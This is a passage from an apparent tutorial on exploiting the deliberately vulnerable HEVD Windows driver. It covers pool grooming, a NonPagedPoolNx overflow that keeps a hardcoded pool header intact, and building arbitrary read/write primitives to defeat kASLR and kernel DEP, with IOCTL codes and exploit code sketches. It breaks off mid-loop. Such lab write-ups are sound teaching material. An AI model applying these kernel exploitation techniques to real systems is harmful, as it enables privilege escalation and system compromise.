Luckily, and slightly contrived, there are two files called ArbitraryReadWriteHelperNonPagedPoolNx.c and ArbitraryReadWriteHelperNonPagedPoolNx.h which are useful to us. As the name suggests, these files seem to allocate some sort of object on the NonPagedPoolNx. Again, note that at this point in the real world we would need to reverse engineer the driver, look at all instances of pool allocations, inspect their arguments at runtime, and see if there isn’t a way to get useful objects into the same pool and kLFH bucket as the vulnerable object for pool grooming.

ArbitraryReadWriteHelperNonPagedPoolNx.h contains two interesting structures, seen below, as well several function definitions (which we will touch on later - please make sure you become familiar with these structures and their members!).

As we can see, each function definition defines a parameter of type PARW_HELPER_OBJECT_IO, which is a pointer to an ARW_HELPER_OBJECT_IO object, defined in the above image!
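Based on how the members are used throughout the rest of the source, the two structures look approximately like this. This is a reconstruction from the text rather than a verbatim copy of the header, so the member order may differ.

// Approximate reconstruction of the structures in
// ArbitraryReadWriteHelperNonPagedPoolNx.h - member order may differ.

// The request structure sent from user mode via DeviceIoControl.
typedef struct _ARW_HELPER_OBJECT_IO
{
    PVOID  HelperObjectAddress;   // kernel address of the helper object, bubbled back to user mode
    PVOID  Name;                  // user-mode pointer used by the Set/Get name operations
    SIZE_T Length;                // size used to allocate/copy the Name buffer
} ARW_HELPER_OBJECT_IO, *PARW_HELPER_OBJECT_IO;

// The 16-byte object allocated on the NonPagedPoolNx by the driver.
typedef struct _ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
{
    PVOID  Name;                  // pool allocation that Set/Get copy into and out of
    SIZE_T Length;                // length used for those copy operations
} ARW_HELPER_OBJECT_NON_PAGED_POOL_NX, *PARW_HELPER_OBJECT_NON_PAGED_POOL_NX;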

Let’s examine ArbitraryReadWriteHelperNonPagedPoolNx.c in order to determine how these ARW_HELPER_OBJECT_IO objects are being instantiated and leveraged in the functions defined in the above image.

Looking at ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see it contains several IOCTL handlers. This is indicative that these ARW_HELPER_OBJECT_IO objects will be sent from a client (us). Let’s take a look at the first IOCTL handler.

It appears that ARW_HELPER_OBJECT_IO objects are created through the CreateArbitraryReadWriteHelperObjectNonPagedPoolNxIoctlHandler IOCTL handler. This handler accepts a buffer, casts the buffer to type ARW_HELPER_OBJECT_IO, and passes the buffer to the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Let’s inspect CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

CreateArbitraryReadWriteHelperObjectNonPagedPoolNx first declares a few things:

  1. A pointer called Name
  2. A SIZE_T variable, Length
  3. An NTSTATUS variable which is set to STATUS_SUCCESS for error handling purposes
  4. An integer, FreeIndex, which is set to the value STATUS_INVALID_INDEX
  5. A pointer of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX, called ARWHelperObject, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we saw previously defined in ArbitraryReadWriteHelperNonPagedPoolNx.h.

The function, after declaring the pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX previously mentioned, probes the input buffer from the client, parsed from the IOCTL handler, to verify it is in user mode and then stores the length specified by the ARW_HELPER_OBJECT_IO structure’s Length member into the previously declared variable Length. This ARW_HELPER_OBJECT_IO structure is taken from the user mode client interacting with the driver (us), meaning it is supplied from the call to DeviceIoControl.

Then, a function called GetFreeIndex is called and the result of the operation is stored in the previously declared variable FreeIndex. If the return value of this function is equal to STATUS_INVALID_INDEX, the function returns the status to the caller. If the value is not STATUS_INVALID_INDEX, CreateArbitraryReadWriteHelperObjectNonPagedPoolNx then calls ExAllocatePoolWithTag to allocate memory for the previously declared PARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointer, which is called ARWHelperObject. This object is placed on the NonPagedPoolNx, as seen below.

After allocating memory for ARWHelperObject, the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then allocates another chunk from the NonPagedPoolNx and allocates this memory to the previously declared pointer Name.

This newly allocated memory is then initialized to zero. The previously declared pointer ARWHelperObject, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX, then has its Name member set to the previously declared pointer Name, which had its memory allocated in the previous ExAllocatePoolWithTag operation, and its Length member set to the local variable Length, which grabbed the length sent by the user mode client in the IOCTL operation via the input buffer of type ARW_HELPER_OBJECT_IO, as seen below. This essentially just initializes the structure’s values.

Then, an array called g_ARWHelperObjectNonPagedPoolNx, at the index specified by FreeIndex, is set to the address of the ARWHelperObject. This array is actually an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, and manages such objects. It is defined at the beginning of ArbitraryReadWriteHelperNonPagedPoolNx.c, as seen below.

Before moving on - I realize this is a lot of code analysis, but I will add in diagrams and tl;dr’s later to help make sense of all of this. For now, let’s keep digging into the code.

Let’s recall how the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function was prototyped:

NTSTATUS
CreateArbitraryReadWriteHelperObjectNonPagedPoolNx(
    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
);

This HelperObjectIo object is of type PARW_HELPER_OBJECT_IO, which is supplied by a user mode client (us). This structure, which is supplied by us via DeviceIoControl, has its HelperObjectAddress member set to the address of the ARWHelperObject previously allocated in CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. This essentially means that our user mode structure, which is sent to kernel mode, has one of its members, HelperObjectAddress to be specific, set to the address of another kernel mode object. This means the kernel mode address will be bubbled back up to user mode. This is the end of the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function! Let’s update our code to see how this looks dynamically. We can also set a breakpoint on HEVD!CreateArbitraryReadWriteHelperObjectNonPagedPoolNx in WinDbg. Note that the IOCTL to trigger CreateArbitraryReadWriteHelperObjectNonPagedPoolNx is 0x00222063.

We know now that this function will allocate a pool chunk for the ARWHelperObject pointer, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on the call to ExAllocatePoolWithTag responsible for this, and enable debug printing.

Also note the debug print Name Length is zero. This value was supplied by us from user mode, and since we initialized the buffer to zero, the length is zero. The FreeIndex is also zero. We will touch on this value later on. After executing the memory allocation operation and inspecting the return value, we can see the familiar Hack pool tag. The chunk is 0x10 bytes (16 bytes) of data plus 0x10 bytes for the _POOL_HEADER structure - making this a total of 0x20 bytes. The address of this ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is 0xffff838b6e6d71b0.

We then know that another call to ExAllocatePoolWithTag will occur, which will allocate memory for the Name member of ARWHelperObject->Name, where ARWHelperObject is of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on this memory allocation operation and inspect the contents of the operation.

We can see this chunk is allocated in the same pool and kLFH bucket as the previous ARWHelperObject pointer. The address of this chunk, which is 0xffff838b6e6d73d0, will eventually be set as ARWHelperObject’s Name member, along with ARWHelperObject’s Length member being set to the original user mode input buffer’s Length member, which comes from an ARW_HELPER_OBJECT_IO structure.

From here we can press g in WinDbg to resume execution.

We can clearly see that the kernel-mode address of the ARWHelperObject pointer is bubbled back to user mode via the HelperObjectAddress of the ARW_HELPER_OBJECT_IO object specified in the input and output buffer parameters of the call to DeviceIoControl.

Let’s re-execute everything again and capture the output.

Notice anything? Each time we call CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, based on the analysis above, an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is created. We know there is also an array of these objects, and the object created by each call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx is assigned to the array at index FreeIndex. After re-running the updated code, we can see that by calling the function again, and therefore creating another object, the FreeIndex value was increased by one. Re-executing everything again for a second time, we can see this is the case again!

We know that this FreeIndex variable is set via a function call to the GetFreeIndex function, as seen below.

Length = HelperObjectIo->Length;

        DbgPrint("[+] Name Length: 0x%X\n", Length);

        //
        // Get a free index
        //

        FreeIndex = GetFreeIndex();

        if (FreeIndex == STATUS_INVALID_INDEX)
        {
            //
            // Failed to get a free index
            //

            Status = STATUS_INVALID_INDEX;
            DbgPrint("[-] Unable to find FreeIndex: 0x%X\n", Status);

            return Status;
        }

Let’s examine how this function is defined and executed. Taking a look in ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see the function is defined as such.

This function, which returns an integer value, performs a for loop based on MAX_OBJECT_COUNT to determine if the g_ARWHelperObjectNonPagedPoolNx array, which is an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NXs, has a value assigned for a given index, which starts at 0. For instance, the for loop first checks if the 0th element in the g_ARWHelperObjectNonPagedPoolNx array is assigned a value. If it is assigned, the index into the array is increased by one. This keeps occurring until the for loop can no longer find a value assigned to a given index. When this is the case, the current value used as the counter is assigned to the value FreeIndex. This value is then passed to the assignment operation used to assign the in-scope ARWHelperObject to the array managing all such objects. This loop occurs MAX_OBJECT_COUNT times, which is defined in ArbitraryReadWriteHelperNonPagedPoolNx.h as #define MAX_OBJECT_COUNT 65535. This is the total amount of objects that can be managed by the g_ARWHelperObjectNonPagedPoolNx array.
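A paraphrased sketch of that logic (not HEVD’s exact code) looks like this:

// Paraphrased sketch of GetFreeIndex: walk the global array of helper object
// pointers and return the first unused slot, or STATUS_INVALID_INDEX if the
// array (MAX_OBJECT_COUNT = 65535 entries) is full.
int GetFreeIndex(VOID)
{
    for (int i = 0; i < MAX_OBJECT_COUNT; i++)
    {
        if (g_ARWHelperObjectNonPagedPoolNx[i] == NULL)
        {
            return i;                      // first free slot
        }
    }

    return STATUS_INVALID_INDEX;           // every slot is in use
}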

The tl;dr of what happens here is in the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function is:

  1. Create an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object called ARWHelperObject
  2. Set the Name member of ARWHelperObject to a buffer on the NonPagedPoolNx, which has a value of 0
  3. Set the Length member of ARWHelperObject to the value specified by the user-supplied input buffer via DeviceIoControl
  4. Assign this object to an array which manages all active ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects
  5. Return the address of the ARWHelperObject to user mode via the output buffer of DeviceIoControl

Here is a diagram of this in action.

Let’s take a look at the next IOCTL handler after CreateArbitraryReadWriteHelperObjectNonPagedPoolNx which is SetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler. This IOCTL handler will take the user buffer supplied by DeviceIoControl, which is expected to be of type ARW_HELPER_OBJECT_IO. This structure is then passed to the function SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, which is prototyped as such:

NTSTATUS
SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx(
    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
)

Let’s take a look at what this function will do with our input buffer. Recall that last time we were able to specify the length used to size the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object ARWHelperObject. Additionally, we were able to return the address of this pointer to user mode.

This function starts off by defining a few variables:

  1. A pointer named Name
  2. A pointer named HelperObjectAddress
  3. An integer value named Index which is assigned to the status STATUS_INVALID_INDEX
  4. An NTSTATUS code

After these values are declared, this function first checks to make sure the input buffer from user mode, the ARW_HELPER_OBJECT_IO pointer, is in user mode. After confirming this, the Name member (a pointer) from this user mode buffer is stored into the pointer Name, previously declared in the listing of declared variables. The HelperObjectAddress member from the user mode buffer - which, after the call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, contained the kernel mode address of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX ARWHelperObject - is extracted and stored into the HelperObjectAddress declared at the beginning of the function.

A call to GetIndexFromPointer is made, with the address of the HelperObjectAddress as the argument in this call. If the return value is STATUS_INVALID_INDEX, an NTSTATUS code of STATUS_INVALID_INDEX is returned to the caller. If the function returns anything else, the Index value is printed to the screen.

Where does this value come from? GetIndexFromPointer is defined as such.

This function will accept any pointer value, but realistically it is used for a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. This function takes the supplied pointer and indexes the array of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers, g_ARWHelperObjectNonPagedPoolNx. If the value hasn’t been assigned to the array (e.g. if CreateArbitraryReadWriteHelperObjectNonPagedPoolNx wasn’t called - since that is what assigns any created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX to the array - or if the object was freed), STATUS_INVALID_INDEX is returned. This function basically makes sure the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is managed by the array. If it does exist, this function returns the index of the array the given object resides in.

Let’s take a look at the next snippet of code from the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

After confirming the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX exists, a check is performed to ensure the Name pointer, which was extracted from the user mode buffer of type PARW_HELPER_OBJECT_IO’s Name member, is in user mode. Note that g_ARWHelperObjectNonPagedPoolNx[Index] is being used in this situation as another way to reference the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, since g_ARWHelperObjectNonPagedPoolNx is, at the end of the day, just an array of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX which manages all active ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers.

After confirming the buffer is coming from user mode, this function finishes by copying the value of Name, which is a value supplied by us via DeviceIoControl and the ARW_HELPER_OBJECT_IO object, to the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

Let’s test this theory in WinDbg. What we should be looking for here is that the value specified by the Name member of our user-supplied ARW_HELPER_OBJECT_IO should be written to the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created in the previous call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Our updated code looks as follows.

The above code should overwrite the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Note that the IOCTL for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x00222067.

We can then set a breakpoint in WinDbg to perform dynamic analysis.

Then we can set a breakpoint on ProbeForRead, which takes our user-supplied ARW_HELPER_OBJECT_IO as its first argument and verifies that it is in user mode. We can parse this memory address in WinDbg, which will be in RCX when the function call occurs due to the __fastcall calling convention, and see that this not only is a user-mode buffer, but it is also the object we intended to send from user mode for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

This HelperObjectAddress value is the address of the previously created/associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. We can also verify this in WinDbg.

Recall from earlier that the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object has its Length member taken from the Length sent from our user-mode ARW_HELPER_OBJECT_IO structure. The Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is also initialized to zero, per the RtlFillMemory call from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx routine - which initializes the Name buffer to 0 (recall that the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is actually a buffer that was allocated via ExAllocatePoolWithTag using the Length specified by our ARW_HELPER_OBJECT_IO structure in our DeviceIoControl call).

ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name is the member that should be overwritten with the contents of the ARW_HELPER_OBJECT_IO object we sent from user mode, which currently is set to 0x4141414141414141. Knowing this, let’s set a breakpoint on the RtlCopyMemory routine, which will show up as memcpy in HEVD via WinDbg.

This fails. The error code here is actually access denied. Why is this? Recall that there is a one final call to ProbeForRead directly before the memcpy call.

ProbeForRead(
    Name,
    g_ARWHelperObjectNonPagedPoolNx[Index]->Length,
    (ULONG)__alignof(UCHAR)
);

The Name variable here is extracted from the user-mode buffer ARW_HELPER_OBJECT_IO. Since we supplied a value of 0x4141414141414141, this isn’t a valid user-mode address, so the call to ProbeForRead fails - hence the access denied error. Instead, let’s create a user-mode pointer and leverage that!

After executing the code again and hitting all the breakpoints, we can see that execution now reaches the memcpy routine.

After executing the memcpy routine, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function now points to the value specified by our user-mode buffer, 0x4141414141414141.

We are starting to get closer to our goal! You can see this is pretty much an uncontrolled arbitrary write primitive in and of itself. The issue here however is that the value we can overwrite, which is ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name is a pointer which is allocated in the kernel via ExAllocatePoolWithTag. Since we cannot directly control the address stored in this member, we are limited to only overwriting what the kernel provides us. The goal for us will be to use the pool overflow vulnerability to overcome this (in the future).

Before getting to the exploitation phase, we need to investigate one more IOCTL handler, plus the IOCTL handler for deleting objects, which should not be time consuming.

The last IOCTL handler to investigate is the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler IOCTL handler.

This handler passes the user-supplied buffer, which is of type ARW_HELPER_OBJECT_IO to GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx. This function is identical to the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function, in that it will copy one Name member to another Name member, but in reverse order. As seen below, the Name member used in the destination argument for the call to RtlCopyMemory is from the user-supplied buffer this time.

This means that if we used the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function to overwrite the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function, then we could use GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx to fetch the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object and bubble it back up to user mode. Let’s modify our code to outline this. The IOCTL code to reach the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x0022206B.

In this case we do not need WinDbg to validate anything. We can simply set the contents of our ARW_HELPER_OBJECT_IO.Name member to junk as a POC that, after the IOCTL call reaches GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, this member will be overwritten by the contents of the associated/previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which will be 0x4141414141414141.

Since tempBuffer is assigned to ARW_HELPER_OBJECT_IO.Name, this is technically the value that will inherit the contents of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name in the memcpy operation from the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function. As we can see, we can successfully retrieve the contents of the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name object. Again, however, the issue is that we are not able to choose what ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name points to, as this is determined by the driver. We will use our pool overflow vulnerability soon to overcome this limitation.

The last IOCTL handler is the delete operation, found in DeleteArbitraryReadWriteHelperObjecNonPagedPoolNxIoctlHandler.

This IOCTL handler parses the input buffer from DeviceIoControl as an ARW_HELPER_OBJECT_IO structure. This buffer is then passed to the DeleteArbitraryReadWriteHelperObjecNonPagedPoolNx function.

This function is pretty simplistic - since HelperObjectAddress points to the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, this member is used in a call to ExFreePoolWithTag to free the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Additionally, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member, which was also allocated with ExAllocatePoolWithTag, is freed.

Now that we know all of the ins and outs of the driver’s functionality, we can continue (please note that we are fortunate to have source code in this case; leveraging a disassembler may take a bit more time to come to the same conclusions we were able to come to).

Okay, Now Let’s Get Into Exploitation (For Real This Time)

We know that our situation currently allows for an uncontrolled arbitrary read/write primitive. This is because the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member is currently set to the address of a pool allocation made via ExAllocatePoolWithTag. With our pool overflow we will try to overwrite this address with a meaningful one. This will allow us to corrupt a controlled address - thus giving us an arbitrary read/write primitive.

Our strategy for grooming the pool, due to all of these objects being the same size and being allocated on the same pool type (NonPagedPoolNx), will be as follows:

  1. “Fill the holes” in the current page servicing allocations of size 0x20
  2. Groom the pool to obtain the following layout: VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
  3. Leverage the read/write primitive to write our shellcode, one QWORD at a time, to KUSER_SHARED_DATA+0x800 and flip the no-eXecute bit to bypass kernel-mode DEP

Recall the earlier sentiment about needing to preserve _POOL_HEADER structures? This is where everything comes full circle for us. Recall from Part 1 that the kLFH still uses the legacy _POOL_HEADER structure to process and store metadata for pool chunks. This means there is no encoding going on, and it is possible to hardcode the header into the exploit so that when the pool overflow occurs, the header of the adjacent chunk is overwritten with the same contents it had before.

Let’s inspect the value of a _POOL_HEADER of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we would be overflowing into.

Since this chunk is 16 bytes and will be part of the kLFH, it is prepended with a standard _POOL_HEADER structure. Because there is no encoding, we can simply hardcode the value of the _POOL_HEADER (recall that the _POOL_HEADER sits 0x10 bytes before the value returned by ExAllocatePoolWithTag). This means we can hardcode the value 0x6b63614802020000 into our exploit so that at the time of the overflow into the next chunk - which should be one of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects we previously sprayed - the first 0x10 bytes written past our chunk, which land on that object’s _POOL_HEADER, are preserved and kept valid, bypassing the invalid-header issue shown earlier.
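For reference, this is how the overflow buffer ends up being laid out in the full exploit at the end of this post - the hardcoded header lands exactly where the adjacent chunk's _POOL_HEADER sits:

// 0x28-byte buffer used for the pool overflow (see readwritePrimitive() in the full exploit)
unsigned long long vulnBuffer[5];
vulnBuffer[0] = 0x4141414141414141;   // fills the 0x10 data bytes of the vulnerable chunk itself
vulnBuffer[1] = 0x4141414141414141;
vulnBuffer[2] = 0x6b63614802020000;   // hardcoded _POOL_HEADER of the adjacent chunk
vulnBuffer[3] = 0x4141414141414141;   // second half of the 0x10-byte header region (don't care)
vulnBuffer[4] = 0x4242424242424242;   // lands on the adjacent object's Name member (set to the "main" object's address later on)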

Knowing this, and knowing we have a bit of work to do, let’s rearrange our current exploit to make it more logical. We will create three functions for grooming:

  1. fillHoles()
  2. groomPool()
  3. pokeHoles()

These functions can be seen below.

fillHoles()

groomPool()

pokeHoles()

Please refer to Part 1 to understand what this is doing, but essentially this technique will fill any fragments in the corresponding kLFH bucket in the NonPagedPoolNx and force the memory manager to (theoretically) give us a new page to work with. We then fill this new page with objects we control, e.g. the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects.

Since we have a controlled pool-based overflow, the goal will be to use the “vulnerable chunk” - which copies memory into its allocation without any bounds checking - to overwrite one of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structures. Since the vulnerable chunk and the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX chunks are of the same size, they will theoretically wind up adjacent to each other, since they will land in the same kLFH bucket.

The last function, called readwritePrimitive() contains most of the exploit code.

The first bit of this function creates a “main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via an ARW_HELPER_OBJECT_IO object, and performs the filling of the pool chunks, fills the new page with objects we control, and then frees every other one of these objects.

After freeing every other object, we then replace these freed slots with our vulnerable buffers. We also create a “standalone/main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Also note that the pool header is 16 bytes in size, meaning it is 2 QWORDS, hence “Padding”.

What we actually hope to do here is the following.

We want to use a controlled write to only overwrite the first member of the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, Name. This is because we have additional primitives to control and return the values of the Name member, as shown earlier in this blog post. The issue we have had so far, however, is that the address of the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is completely controlled by the driver and cannot be influenced by us, unless we leverage a vulnerability (a la pool overflow).

As shown in the readwritePrimitive() function, the goal here will be to actually corrupt the adjacent chunk(s) with the address of the “main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we will manage via ARW_HELPER_OBJECT_IO.HelperObjectAddress. We would like to corrupt the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a precise overflow to corrupt the Name value with the address of our “main” object. Currently this value is set to 0x9090909090909090. Once we prove this is possible, we can then take this further to obtain the eventual read/write primitive.

Setting a breakpoint on the TriggerBufferOverflowNonPagedPoolNx routine in HEVD.sys, and setting an additional breakpoint on the memcpy routine, which performs the pool overflow, we can investigate the contents of the pool.

As seen in the above image, we can clearly see we have flooded the pool with controlled ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, as well as the “current” chunk - which refers to the vulnerable chunk used in the pool overflow. All of these chunks are prefaced with the Hack tag.

Then, after stepping through execution until the memcpy routine, we can inspect the contents of the next chunk, which is 0x10 bytes after the value in RCX, which is used as the destination for the memory copy operation. Remember - our goal is to overwrite the adjacent pool chunks. Stepping through the operation, we can clearly see that we have corrupted the next pool chunk, which is of type ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

We can validate that the address which was written out-of-bounds is actually the address of the “main”, standalone ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object we created.

Remember - a _POOL_HEADER structure is 0x10 bytes in length. This makes every pool chunk within this kLFH bucket 0x20 bytes in total size. Since we want to overflow adjacent chunks, we need to preserve the pool header, and since we are in the kLFH we can just hardcode it, as we have proven, to satisfy the pool and avoid any crashes which may arise as a result of an invalid pool chunk. Additionally, the first 0x10 bytes of our copy simply fill the data portion of the “vulnerable” chunk itself (the destination address in RCX, which is a 0x20-byte chunk whose first half is its own header), and we don’t actually care about corrupting our own data - we are worried about corrupting the adjacent chunk. Because of this, we set the next 0x10 bytes of the copy - the first bytes that actually land out of bounds - to the hardcoded header value, ensuring that the bytes which overwrite the adjacent chunk’s _POOL_HEADER keep it valid.

We have now successfully performed our out-of-bounds write via a pool overflow and corrupted an adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object’s Name member. That member is dynamically allocated on the pool beforehand at an address we do not control, but by leveraging a vulnerability such as this out-of-bounds write, we have replaced it with an address we do control - the address of the object created previously.

Arbitrary Read Primitive

Although it may not be totally apparent currently, our exploit strategy revolves around our ability to use our pool overflow to write out-of-bounds. Recall that the “Set” and “Get” capabilities in the driver allow us to read and write memory, but not at controlled locations. The location is controlled by the pool chunk allocated for the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

Let’s take a look at the corrupted ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. The corrupted object is one of the many sprayed objects. We successfully overwrote the Name member of this object with the address of the “main”, or standalone, ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object.

We know that it is possible to set the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structure via the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function through an IOCTL invocation. Since we now control the value of Name in the corrupted object, let’s see if we can abuse this to build an arbitrary read primitive.

Let’s break this down. We know that we currently have a corrupted object with a Name member that is set to the value of another object. For brevity, we can recall this from the previous image.

If we perform a “Set” operation on the corrupted object (shown in the dt command, which currently has its Name member set to 0xffffa00ca378c210), it will perform this operation on the Name member. However, we know that the Name member is actually currently set to the address of the “main” object via the out-of-bounds write! This means that performing a “Set” operation on the corrupted object will actually take the address of the main object, since it is stored in the Name member, dereference it, and write the contents specified by us. This will cause our main object to then point to whatever we specify, instead of the value of 0xffffa00ca378c3b0 currently outlined in the memory contents shown by dq in WinDbg. How does this turn into an arbitrary read primitive? Since our “main” object will point to whatever address we specify, the “Get” operation, if performed on the “main” object, will then dereference the address specified by us and return the value!
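To make the mechanics concrete, here is a condensed sketch of the two IOCTL calls involved (0x00222067 = “Set”, 0x0022206B = “Get”). The names corruptedIo and mainIo are placeholders for the ARW_HELPER_OBJECT_IO structures managing the corrupted groomed object and the main object, mirroring what the full exploit at the end of this post does:

// Condensed sketch: read one QWORD from an arbitrary kernel address using the
// corrupted object (corruptedIo) and the main object (mainIo)
unsigned long long arbitraryRead(HANDLE driverHandle, ARW_HELPER_OBJECT_IO* corruptedIo,
                                 ARW_HELPER_OBJECT_IO* mainIo, unsigned long long whatToRead)
{
    unsigned long long readValue = 0;
    DWORD bytesReturned = 0;

    // "Set" on the corrupted object: its kernel-side Name points at the main object,
    // so this writes whatToRead into the main object's Name member
    corruptedIo->Name = &whatToRead;
    DeviceIoControl(driverHandle, 0x00222067, corruptedIo, sizeof(*corruptedIo),
                    NULL, 0, &bytesReturned, NULL);

    // "Get" on the main object: the driver dereferences its (now attacker-controlled)
    // Name pointer and copies the pointed-to value back into readValue
    mainIo->Name = &readValue;
    DeviceIoControl(driverHandle, 0x0022206B, mainIo, sizeof(*mainIo),
                    mainIo, sizeof(*mainIo), &bytesReturned, NULL);

    return readValue;
}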

In WinDbg, we can “mimic” the “Set” operation as shown.

Performing the “Set” operation on the corrupted object will actually set the value of our main object to whatever is specified by the user, due to us corrupting the previous random address with the pool overflow vulnerability. At this point, performing the “Get” operation on our main object, since its Name was set to the value specified by the user, will dereference that value and return it to us!

At this point we need to identify what our goal is. To comprehensively bypass kASLR, our goal is as follows:

  1. Use the base address of HEVD.sys from the original exploit in part one to provide the offset to the Import Address Table
  2. Supply an IAT entry that points to ntoskrnl.exe to the exploit to be arbitrarily read from (thus obtaining a pointer to ntoskrnl.exe)
  3. Calculate the distance from the pointer to the kernel to obtain the base

We can update our code to outline this. As you may recall, we have groomed the pool with 5000 ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects. However, we did not spray the pool with 5000 “vulnerable” objects. Since we have groomed the pool, we know that the vulnerable object we can arbitrarily write past will end up adjacent to one of the objects used for grooming. Since we only trigger the overflow once, and since we have already set the Name values of all of the objects used for grooming to 0x9090909090909090, we can simply use the “Get” operation to view each Name member of the objects used for grooming. If one of the objects does not contain NOPs, this indicates that the pool overflow outlined previously, which corrupts the Name value of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX, has succeeded.
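A condensed version of this scan, mirroring the loop in readwritePrimitive() from the full exploit below:

// Query every groomed object; the one whose Name no longer reads back as NOPs
// is the object that was corrupted by the pool overflow
int corruptedIndex = -1;
DWORD bytesReturned = 0;

for (int i = 0; i < 5000; i++)
{
    unsigned long long placeholder = 0x9090909090909090;
    helperobjectArray[i].Name = &placeholder;

    // "Get" the kernel-side Name contents of this groomed object
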